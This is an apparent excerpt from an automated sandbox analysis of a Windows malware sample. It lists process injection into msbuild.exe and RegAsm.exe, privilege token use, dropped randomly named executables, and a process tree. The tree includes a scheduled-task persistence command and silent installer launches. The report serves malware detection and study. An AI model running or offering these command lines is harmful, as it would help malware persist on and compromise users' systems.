N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4204 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1512 wrote to memory of 832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe
PID 1512 wrote to memory of 832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe
PID 1512 wrote to memory of 832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe
PID 1512 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 2980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
PID 1512 wrote to memory of 2980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
PID 1512 wrote to memory of 2980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
PID 1512 wrote to memory of 4912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe
PID 1512 wrote to memory of 4912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe
PID 1512 wrote to memory of 4912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe
PID 1512 wrote to memory of 1464 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe
PID 1512 wrote to memory of 1464 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe
PID 1512 wrote to memory of 1464 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4912 wrote to memory of 5084 N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 832 wrote to memory of 856 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.0.exe
PID 832 wrote to memory of 856 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.0.exe
PID 832 wrote to memory of 856 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.0.exe
PID 1512 wrote to memory of 1352 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
PID 1512 wrote to memory of 1352 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
PID 1512 wrote to memory of 1352 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
PID 832 wrote to memory of 4232 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.1.exe
PID 832 wrote to memory of 4232 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.1.exe
PID 832 wrote to memory of 4232 N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe C:\Users\Admin\AppData\Local\Temp\un4.1.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 5084 wrote to memory of 1404 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 1512 wrote to memory of 440 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe
PID 1512 wrote to memory of 440 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe
PID 4232 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1512 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1512 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1880 wrote to memory of 2260 N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1880 wrote to memory of 2260 N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1880 wrote to memory of 2260 N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
PID 1604 wrote to memory of 4948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 1604 wrote to memory of 4948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe

"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe

"C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe"

C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe

"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"

C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe

"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"

C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe

"C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe"

C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe

"C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 4912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 884

C:\Users\Admin\AppData\Local\Temp\un4.0.exe

"C:\Users\Admin\AppData\Local\Temp\un4.0.exe"

C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe

"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"

C:\Users\Admin\AppData\Local\Temp\un4.1.exe

"C:\Users\Admin\AppData\Local\Temp\un4.1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 832 -ip 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 1512

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe

"C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 616

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 648

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --silent --allusers=0

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6deae1a8,0x6deae1b4,0x6deae1c0

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --version

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1880 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142129" --session-guid=647b75d8-1d1a-401a-8239-98e5764e4505 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=B005000000000000

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d52e1a8,0x6d52e1b4,0x6d52e1c0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1464 -ip 1464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 1156

C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe

"C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe

.\Install.exe /YnGgdidyhQpz "385118" /S

C:\Windows\SysWOW64\forfiles.exe

